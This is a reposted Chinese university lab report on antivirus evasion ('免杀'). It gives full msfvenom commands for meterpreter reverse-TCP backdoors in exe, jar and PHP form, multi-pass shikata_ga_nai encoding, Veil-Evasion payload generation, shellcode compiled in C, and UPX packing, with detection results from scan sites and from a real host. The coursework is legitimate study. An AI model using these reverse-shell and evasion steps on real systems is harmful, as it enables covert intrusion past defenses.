20155328 《网络攻防》 实验三:免杀原理与实践

最新推荐文章于 2024-09-05 11:10:46 发布
最新推荐文章于 2024-09-05 11:10:46 发布
阅读量119 收藏
点赞数
文章标签: python 运维 php
原文链接:http://www.cnblogs.com/zyqzyq/p/8783682.html
版权

20155328 《网络攻防》 实验三:免杀原理与实践

实验过程记录

正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
将实验二中生成的后门程序投递到virscan网站上,扫描结果如下:
1065527-20180410223127002-1026508725.png

用virustotal扫描结果如下:
1065527-20180410223138661-1104618375.png

尝试用msf编码器对后门程序进行一次或多次编码。

一次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.217.128 LPORT=443 -f exe > met-encoded.exe

十次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.217.128 LPORT=443 -f exe > met-encoded10.exe
1065527-20180410223150134-1971295885.png

用命令msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.217.128 lport=443 x> 20155312_backdoor_java.jar生成jar文件:
1065527-20180410223201205-83900002.png

用命令msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.217.128 lport=443 x> 20155312_backdoor.php生成PHP后门程序:
1065527-20180410223212318-1813730585.png

veil-evasion

这个过程需要先安装veil-evasion,由于网速太慢,安装过程耗时太多。我用了同学的虚拟机来做这部分实验。

先在终端中输入veil命令启用veil;然后输入veil evasion进入。
1065527-20180410223231245-933935629.png
1065527-20180410223238665-2058901242.png

输入命令use python/meterpreter/rev_tcp.py用python语言重写meterpreter。
1065527-20180410223246733-1463170578.png

set LHOST 192.168.217.132设置反弹连接IP,set LPORT 5328设置端口。
1065527-20180410223254906-1239387342.png

输入generate生成文件,填写payload的名称。出现错误提示,没法用python语言。
1065527-20180410223305945-1155058211.png

然后就从头开始,将use...中的python换成c即可。
1065527-20180410223318485-1497774086.png
1065527-20180410223328337-1271770731.png

成功生成的payload如图所示。
1065527-20180410223338913-943531673.png

在virscan中投递,查看有没有起到免杀效果。可以看到还是好了很多的。
1065527-20180410223347838-133345137.png

C语言调用shellcode

kali终端下,输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=443 -f c,生成数组。
1065527-20180410223401049-326842430.png

创建20155328.c,把数组拷贝进去,并加上主函数。
1065527-20180410223410663-787461672.png

终端下输入i686-w64-mingw32-g++ MSSC.c -o 20155328.exe生成可执行文件20155328.exe。投递到virscan上。
1065527-20180410223420809-249242741.png

把可执行文件移到主机中,运行后马上就被360查出来了。(反应速度真的很快。。我都没反应过来
1065527-20180410223431850-995334993.png

(查出来)

加壳

在kali中用upx命令对可执行文件进行加壳操作。
1065527-20180410223439132-126746722.png

(加壳)

移到主机中,运行后进行全面杀毒,也没有查出来(朋友的电脑本身有一些危险

1065527-20180410223448212-2086810568.png

1065527-20180410223454228-10046540.png

基础问题回答

  • 杀软是如何检测出恶意代码的?

通过检测特征码或者特定行为。恶意代码都有其特有的特征码。

  • 免杀是干啥的?

防止计算机杀毒软件对恶意代码的查杀。

  • 免杀的基本方法有啥?

改变特征码;在看似正常的应用中插入特征码。

离实战缺什么

不知道该怎么把自己生成的后门放到想攻击的机器里。

实践总结与体会

老师今天上课说要带着好奇心去做。。其实做这个还是有点意思的,不断尝试检测看能否躲过杀毒软件,又不断改进。下次加油。。不要再拖到这么晚做了。。

转载于:https://www.cnblogs.com/zyqzyq/p/8783682.html

weixin_34377919
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20211915 2022-2023 -4 《网络攻击防护》实验五
ashoreG的博客
04-05 244
网络攻防实验五
20211915 2022-2023-2 《网络攻击防护》实验三
ashoreG的博客
03-22 165
网络攻防第三次作业
免杀原理实践
weixin_30240349的博客
04-08 173
杀软原理 目前杀毒软件的原理主要有3种: 1.引擎与病毒库的交互作用,通过特征码提取与病毒库中的特征码进行比对识别病毒。 2.启发式Heuristic,通过程序的一些行为和特征来判断。 3.在虚拟机技术上的启发式,通过建立一个虚拟环境运行程序对其进行全方位的检测。 了解更多可见“杀毒软件工作原理 及 现在主要杀毒技术”。 免杀原理 免杀就是躲杀软的识别,那就从杀软的原理下手。 1....
木马免杀小尝试
0pt1mus
02-05 771
转自个人博客:super.j的博客 背景 随着一个多月的时间,实验室渗透测试的任务随着A组大佬打通关,从远程的渗透工作也算是有了一个比较完美的结束。收集到了扫描、攻击等信息。为了丰富收集的攻击数据的完整性,因此随后开展了在3网段的社工攻击,以丰富收集到的攻击数据,为之后的知识图谱的构建打好基础。 技术手段 主要技术 技术 描述 veil-evasion 一个生成木马工具,有着不少的...
20145209刘一阳《网络对抗》实验三免杀原理实践
weixin_33742618的博客
03-29 123
20145209刘一阳《网络对抗》实验三免杀原理实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 根据特征来检测:恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。 根据行为来检测:如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码,有时候不是恶意代码的程序也会把查杀,因为这些程序做了一些计算机认为不安全的事情,比较常见...
Kali——绕过杀毒软件检测工具Veil-Evasion
董哥的黑板报
06-25 3335
一、Veil-Evasion工具介绍 逃过杀毒软件检测的方式有很多,其中很优秀的方法需要一定的编译和汇编的知识。此处只是介绍一种简单而且可以躲过杀毒软件查杀的工具Veil-Evasion 绕过杀毒软件检测的原理:许多的杀毒软件都采用了模式匹配或者特征匹配的工作模式,如果一个程序中不存在病毒库的特征码,那么该杀毒软件就不会认为这是一个病毒文件。因此我们需要修改或者掩盖恶意软件的特征码,这样杀毒软...
kali之——安装免杀工具Veil-Evasion
热门推荐
冰河的专栏
12-08 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84895163 Veil Evasion简介 Veil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。 免责声明:本教程目的只是为了教育,我们不对这些东西会如何使用担任何风险,使用它的后果自负。 Veil-Evasion被...
西南科技大学网络攻防与对抗实验三,ARP欺骗实验
06-02
本实验旨在帮助学生深入理解ARP欺骗的原理,掌握其实施步骤,并通过使用Cain工具进行实践操作,增强对网络安全攻防的理解。 **二、实验环境与工具** 实验环境包括两台虚拟机:一台运行Windows XP作为攻击者,另一...
Remote-DNS-Attack:远程DNS缓存攻击__山东大学网络攻防实验三__代码与资源
03-23
在此次山东大学的网络攻防实验三中,学生将深入理解这种攻击方式,并通过提供的代码与资源进行实践操作。 DNS是互联网的重要组成部分,它的主要任务是将易于记忆的域名转换为计算机可识别的IP地址。然而,由于DNS...
网络攻防原理第01讲网络对抗概述
10-28
参考书目包括吴礼发、洪征、李华波的《网络攻防原理》,胡建伟、汤建龙、杨绍全等的《网络对抗原理》,闫宏生、王雪莉、杨军等的《计算机网络安全与防护》等。 课程内容包括网络安全事件、网络对抗相关概念、网络...
网络攻防实验指导书.docx
09-30
本次网络攻防实验通过实践操作的方式,使学习者深入理解了网络嗅探技术的应用及其背后的原理。掌握了Sniffer Pro和URLSnooper的使用方法后,可以在网络安全监测、故障排查等多个场景中发挥重要作用。此外,通过对...
网络攻防实验报告.rar
07-29
网络攻防:深入理解与实践网络攻防是一门深奥且充满挑战的学科,它涵盖了网络安全的多个方面,包括攻击手段、防御策略以及漏洞的分析与利用。本篇将围绕“网络攻防实验报告”中的核心知识点展开详细讨论。 ...
Python基础 5 - 类、对象、注解
云端梦留白的博客
09-04 1116
面向对象(Object-Oriented, OOP)是一种编程范式,它使用“对象”来设计软件,这些对象包含数据(通常称为属性或字段)和代码(通常称为方法或函数),以模拟现实世界实体的属性和行为。面向对象是一种编程方法,通过创建包含数据和行为的对象来模拟现实世界,提高代码的组织性、重用性和灵活性。在 Pyhon 中,想要使用类,必须先创建对象。class 类名称 : # class 关键字,表示定义了一个类,类首字符大写为标准。
Transiting from CUDA to HIP (二)
weixin_44500921的博客
09-03 1232
为了解决这个问题,HIP(Heterogeneous-compute Interface for Portability)提供了一套宏定义,使得开发者可以编写可移植的代码,这些代码可以在 NVIDIA 的 CUDA 平台和 AMD 的 ROCm 平台上运行。是一个预定义的宏,用于指示当前编译的代码所针对的 NVIDIA GPU 的计算能力(Compute Capability)。为了正确编译包含 HIP 代码的文件,您需要确保编译器能够找到 HIP 的头文件,并且定义了正确的宏。
【hot100篇-python刷题记录】【数据流的中位数】
m0_73629042的博客
09-04 294
精简的代码总是难以琢磨。
asyncio note
weixin_48232453的博客
09-03 827
python异步库asyncio入门
访问数组索引时超出边界引发 ArrayIndexOutOfBoundsException
最新发布
Itmastergo的博客
09-05 884
在 Java 中,数组是一种数据结构,用于存储固定数量的同类型元素。数组中的元素可以是基本数据类型(如intcharfloat等)或引用类型(如String、自定义类等)。数组是一种线性表数据结构,也就是说,数组中的元素可以通过一个整数索引来访问。数组的索引从0开始,这意味着对于长度为n的数组,合法的索引范围是从0到n-1。// 创建一个长度为 5 的整型数组在上面的例子中,numbers是一个包含 5 个整型元素的数组,索引从0到4。数组的大小在创建时就已经固定,因此无法动态扩展。
jupter_notebook简单介绍以及安装使用
Ctrl+CV九段手
09-02 1619
Jupyter如果工作主要涉及数据科学、机器学习、教育或需要创建可共享的交互式文档,Jupyter Notebook 是一个很好的选择。如果需要一个全面的开发环境来构建和维护大型的 Python 应用程序,或者正在从事软件工程项目,PyCharm 会更适合哦!
计算机毕业设计选题推荐-任务管理系统-项目任务分配系统-Java/Python项目实战
IT研究室的博客
09-03 812
随着信息化技术的迅猛发展,各类企业和组织越来越依赖于高效的任务管理系统以保证其日常运营的顺利进行。根据IDC(国际数据公司)发布的报告显示,全球企业在数字化转型上的投入已达数千亿美元,其中相当一部分资金用于提升企业内部的管理效率。任务管理系统作为企业信息化的重要组成部分,能有效帮助企业分配、监控和反馈任务,从而提高工作效率。然而,尽管市场上已有多种任务管理系统,它们在功能、用户体验和适用性上存在显著差异。
福州大学网络攻防实验:TCP RST攻击与防范实践
福州大学信息安全专业的网络攻防实验是该专业学生必做的实践课程,旨在通过实际操作深入了解TCP协议的工作原理和潜在的安全风险。本实验聚焦于TCP协议中的RST(Reset)攻击与防范。RST攻击利用TCP协议的复位功能,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值